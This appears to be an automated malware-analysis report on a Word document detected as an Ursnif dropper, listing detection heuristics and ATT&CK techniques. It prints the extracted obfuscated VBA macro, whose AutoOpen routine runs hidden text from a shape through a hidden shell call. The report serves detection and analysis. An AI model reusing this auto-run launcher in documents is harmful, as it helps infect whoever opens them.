MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating it is likely part of the Ursnif family. The presence of an AutoOpen VBA macro, specifically the 'macros.bas' script, suggests an attempt to execute malicious code upon opening the document. The script uses 'Interaction.Shell' to run a command, likely to download and execute a second-stage payload, which is a common dropper behavior.
Heuristics 5
-
ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1414 bytes |
SHA-256: b87169c34ec094d04406ad92ae4ed374ad713c2c8db663a65fef223e8607951f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "chefowe" Function jeXhqoI() Set jeXhqoI = ActiveDocument.Shapes(2) Dim FDGWC As Integer Dim rxanykir As Long FDGWC = 6972# - 4508# Dim jsRWEh As Variant jsRWEh = FDGWC - 2899# End Function Sub AutoOpen() Dim PFMlTrd As Integer Dim NWLOoAWp As Long PFMlTrd = 6104# - 1540# Dim KOLlajz As Variant KOLlajz = PFMlTrd - 8083# Dim ubnuxW As Integer Dim UdgvlwM As Long ubnuxW = 5311# - 9974# Dim RVgfDd As Variant RVgfDd = ubnuxW - 7654# Dim npuhypigif As Integer Dim fruna As Long npuhypigif = 1369# - 7219# Dim qcykavyza As Variant qcykavyza = npuhypigif - 2686# Set rvuwage = jeXhqoI IvqlPB = jeXhqoI.AlternativeText Dim jpyxo As Integer Dim Nzrnz As Long jpyxo = 6713# - 8222# Dim jNsepbzW As Variant jNsepbzW = jpyxo - 4069# Interaction.Shell@ _ IvqlPB, vbHide Dim fzere As Integer Dim xvusiromi As Long fzere = 6854# - 2189# Dim cGgzlFg As Variant cGgzlFg = fzere - 7456# Dim ssuqajaf As Integer Dim zcEMGjY As Long ssuqajaf = 5938# - 7681# Dim vmyvog As Variant vmyvog = ssuqajaf - 7366# End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.